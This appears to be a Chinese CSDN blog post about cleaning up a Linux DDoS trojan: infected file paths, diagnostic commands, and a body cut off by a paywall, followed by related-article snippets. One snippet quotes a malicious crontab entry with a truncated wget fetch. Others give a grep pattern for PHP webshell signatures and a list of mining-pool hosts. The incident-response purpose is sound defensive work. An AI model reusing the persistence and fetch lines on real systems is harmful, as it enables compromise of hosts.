[记录]Linux木马一记

最新推荐文章于 2024-06-23 20:26:48 发布
原创 最新推荐文章于 2024-06-23 20:26:48 发布 · 2.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文记录了一次Linux系统遭受木马攻击的事件。中毒机器表现为大量发送数据包,影响网络。文中列举了受感染的文件路径,并提供了排查木马的命令如`ps`、`lsof`、`netstat`等。解决方法包括断网、封禁端口、查找并删除木马文件,以及使用`chattr`命令阻止木马进程重启。不过,木马的自我复制机制尚未完全理解。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.相关文章

http://news.drweb.com/show/?i=5801&lng=en

http://bbs.appstar.com.cn/thread-10205-1-1.html

http://blog.youkuaiyun.com/liukeforever/article/details/38560363

http://securelist.com/analysis/publications/64361/versatile-ddos-trojan-for-linux/

2.中毒现象

中毒机器大量向外发送数据包,导致机房网络出现严重丢包,

所有被感染的目录和文件:

/etc/init.d/selinux

/etc/init.d/DbSecuritySpt


/etc/rc[1-5].d/S99selinux

/etc/rc[1-5].d/S97DbSecuritySpt


/usr/bin/bsd-port

/tmp/gate.lod

/tmp/moni.lod

/usr/bin/dpkgd

/usr/bin/.sshd


tomcat主目录下conf.n和可运行文件lf

木马文件本身会生成多个拷贝,还有可能转移到其他目录,

确定是否为同一个文件拷贝的方法是计算文件的MD5值:

   md5sum  xxx.file

3.排查木马所用到的指令

ps 

lsof

netstat

(当然这些脚本本身已经被木马篡改,所以应该从其他地方下载未被感染的脚本)

strings

md5sum 

rpm -Va 

c

最低0.47元/天 解锁文章

200万优质内容无限畅学
immershy
关注
Linux系统木马查杀
Saindy5828的专栏
02-18 1120
查看进程打开的文件、文件或目录被哪个进程占用、打开某个端口的进程、系统所有打开的端口等信息。监控TCP连接实时网络流量,可分别分析出入流量并进行排序,查找出流量异常的IP地址。查看系统监听的所有端口、网络连接情况,查找连接数过多的IP地址等信息。监控每个进程使用的网络流量,并从高到低排序,方便查找出流量异常的进程。查看运行的进程和进程系统资源占用情况,查找异常进程。追踪一个进程执行的系统调用,分析木马进程的运行情况。以树状图的形式显示进程间的关系。使用常用木马查杀命令。
linux 木马 源码,一款新型的Linux挖矿木马来袭
weixin_29577885的博客
05-12 1463
事件描述样本分析1.对一系列矿池地址进行DNS查询请求,如下:相应的矿池地址列表如下:pool.minexmr.com、xmr-eu1.nanopool.org、xmr-eu2.nanopool.orgxmr-us-east1.nanopool.org、xmr-us-west1.nanopool.org、xmr-asia1.nanopool.orgxmr-jp1.nanopool.org、xmr-...
Linux查杀***经验总结
weixin_34417200的博客
05-23 293
前段时间公司网络异常,访问公网和内网都出现丢包,甚至无法访问的情况。登录网关查看监控,发现OA服务器的出方向流量异常,并连接了一个国外IP地址。 然后想登录OA服务器排查,发现登录不上,ping丢包严重,猜测服务器的CPU、连接数或带宽被占满,导致无法登录。 OA服务器是部署在一台Esxi上的虚拟机,Esxi主机也登录不上了,首先拔掉了Esxi的网线,阻止...
Linux下简单的木马查杀
周瑜的博客
02-07 1342
最近开发服务器经常报警,作为一个安防小菜鸟。总结了以下的查杀套路以供将来参考。2021-02-07 查杀思路 先查看系统中有没有异样的进程 找到异常进程之后 kill 掉 找到异常进程启动的位置并修复 具体的查杀步骤 先看到阿里云的报警信息 其实这里阿里云的报错还是挺清晰的了,主要是因为用nexus搭建的私服被破了,然后黑客通过nexus 执行了shell命令。(第一次看到这个后一脸懵逼,不知所措) 然后通过 top 查看运行的进程 发现了异常的进程 network01 kill -9
记录一次linux病毒清除过程
NLP家的码奴小荷的博客
01-13 4568
Linux 木马清除
Linux手动木马查杀过程
05-04
Linux手动木马查杀过程,处理安全问题很重要的,建议下载看看
记一次入侵Linux服务器和删除木马程序的经历
01-10
防火墙(iptables)什么的都没有开启,但是服务器前面有物理防火墙,而且机器都是做的端口映射,也不是常见的端口,按理来说应该是满安全的,可能最近和木马有缘吧,老是让我遇到,也趁这次机会把发现过程记录一下。...
Linux木马检测技术分析与系统调用权限验证法.pdf
09-07
根据功能和实现方式,Linux木马可以分为两类:一是通过替换系统程序,使得原本安全的程序变成恶意的后门;二是独立安装木马程序,这些程序通常会在后台运行,监听网络连接,等待黑客的指令。木马的隐蔽性是其关键...
ld-linux-x86-64.so.2挖矿木马,排查操作记录
Nikkis的博客
12-27 4619
排查并彻底清除ld-linux-x86-64.so.2挖矿木马
Linux下手动查杀木马
菜鸟、上路
08-25 7216
一、 模拟木马程序病原体并让木马程序自动运行 黑客让脚本自动执行的三种方法: 计划任务,crontab;开机启动;系统命令被替换,使用命令后被触发。 1、 生成木马程序病原体 [root@xuegod120 ~]# vim /usr/bin/fregonnzkq #!/bin/bash touch /tmp/aaa.txt while true do echo date >> /tmp...
Linux特洛伊木马关键技术研究.pdf
12-09
Linux特洛伊木马关键技术研究.pdf 在校时下载的文档
Linux 下一木马程序分享
系统运维
03-05 334
前几天公司服务器被添加了一木马恶意程序,该程序一运行便对外发起了大量的连接,导致整个内网瘫痪掉,该木马注入的方式非常简单,只是在Linux crond定时器里加入以下任务: [root@localhost tmp]# crontab -l * * * * * /root/.zxc >/dev/null 2>&1 @weekly wget -q http://stab...
Linux下手动查杀木马过程
吕巡鑫
03-09 915
文章目录1 使用rootkit把木马程序的父进程和木马文件隐藏 (此章节实验需在CentOS 6下进行)1.1Rootkit概述1.2实战-通过rootkit隐蔽行踪1、安装adore-ng2、测试,查看帮助:实战1:演示ava提权功能1、准备测试环境2、创建一个普通用户3、通过ava命令提权,让普通用户xinsz08可以获得root权限4、使用r命令选项提权5、在别一个终端上查看,运行此vim...
Linux下手动查杀木马与Rootkit的实战指南
weixin_43822401的博客
06-23 791
手动查杀Linux下的木马和Rootkit需要对系统有深入的了解和正确的工具。通过模拟攻击者的行为,我们可以更好地理解他们的技术手段,并采取相应的防御措施。攻击者可能会编写权限维持脚本,这些脚本通过父进程检测子进程的存在,如果子进程被删除,父进程将自动重启子进程。它可以扫描已知的rootkit特征码,并检查系统文件的异常属性。rkhunter将执行一系列测试,包括MD5校验、检测rootkits使用的二进制文件、特洛伊木马的特征码检测等。请注意,本文中的技术仅供教育目的,切勿用于非法活动。
记一次手动查杀Linux服务器挖矿木马
3D的博客
01-17 2745
我实验室的座位隔壁放着一台其他课题组管理的服务器,平时利用率不高。那天我发现服务器的风扇转速拉满持续了至少一天,遂问隔壁在跑什么东西,隔壁同学在课题组问了一圈发现没人在用。两天后我恰好有点时间,帮他们在服务器上进行调查。最终发现是中了挖矿木马,进行了杀毒并把多个存在的系统漏洞都补上了。第一次手动实战查杀,故记录方法和过程。系统版本:Ubuntu 20.04 LST。
linux php木马下载,Linux shell快速查找PHP木马
weixin_39645343的博客
03-19 222
一句话查找 PHP 木马find ./ -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc|base64_decode|Create_Function|ob_start|pack|relset_UC_key" > /tmp/php.txtgrep...
linux 木马清理过程
Larry的博客
12-11 3187
http://mp.weixin.qq.com/s?__biz=MzA4Nzc4MjI4MQ==&mid=401028869&idx=1&sn=fb40e2d0f353c8cf3353cc3a6352957b&scene=5&srcid=12064TTIfnETNDOM69pF8lR3#rd 服务器出现异常,完全无法访问,ssh登陆都极其缓慢 解决过程 top 查看
linux上php木马、后门查杀总结
张同光 (Tongguang Zhang):Hello everyone !
02-01 3283
http://ggmmchou.blog.163.com/blog/static/59333149201151733626676/ linux上php木马、后门查杀总结     经过联系断续一个月的对抗,网站被攻击、挂马、做SEO黑帽的问题终于告一段落,现在总结下经验。 Web Server(Nginx为例)1、为防止跨站感染,要做虚拟主机目录隔离(我是直接利用fpm建立多
kali Linux木马病毒
最新发布
04-12
### Kali Linux木马病毒的防护与检测方法 Kali Linux 是一款主要用于渗透测试的安全操作系统,其设计初衷并非为了生成恶意软件或木马病毒,而是帮助安全研究人员评估系统的安全性。然而,由于其强大的工具集,也可能被误用或滥用。因此,在合法合规的前提下,掌握如何在 Kali Linux 环境下进行木马病毒的防护与检测至关重要。 #### 一、木马病毒的常见特征识别 木马病毒通常通过伪装成正常的程序来欺骗用户执行,从而获取目标主机上的敏感信息或实现远程控制。以下是常见的木马病毒行为特征[^1]: - **隐蔽启动**: 木马会在系统启动时自动运行。 - **隐藏进程**: 使用特定命令可以发现异常的后台进程。 - **网络通信**: 不明流量可能表明存在木马连接到外部服务器。 可以通过以下方式检测这些特征: ```bash ps aux | grep suspicious_process_name netstat -anp | grep ESTABLISHED ``` #### 二、基于日志分析的检测手段 许多木马会留下操作痕迹于系统日志中。通过定期审查 `/var/log/` 下的日志文件,能够捕捉可疑活动。例如: ```bash tail -f /var/log/syslog cat /var/log/auth.log | grep 'failed' ``` 上述命令可以帮助管理员监控登录失败记录以及潜在入侵尝试[^2]。 #### 三、使用反病毒扫描器ClamAV 尽管 Kali 主要面向攻击模拟而非防御场景, 它仍然内置了一些可用于自我保护的工具, 如 Clam AntiVirus (ClamAV)[^3]. 可以安装并配置此软件来进行全盘扫描: ```bash sudo apt-get install clamav clamtk clamscan --recursive=yes --infected / ``` #### 四、实施防火墙策略 合理设置 iptables 或 ufw 防火墙规则能有效阻止未授权访问请求进入受感染机器内部网段: ```bash sudo ufw allow ssh/tcp sudo ufw deny http/tcp sudo ufw enable ``` 以上措施均需结合实际环境调整参数值以满足具体需求。 #### 五、教育与意识提升 最后也是最重要的一环在于增强使用者对于网络安全威胁的认知水平。只有当每个人都意识到随意下载不明来源附件的危害性之后,才能从根本上减少此类事件发生的概率。 相关问题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值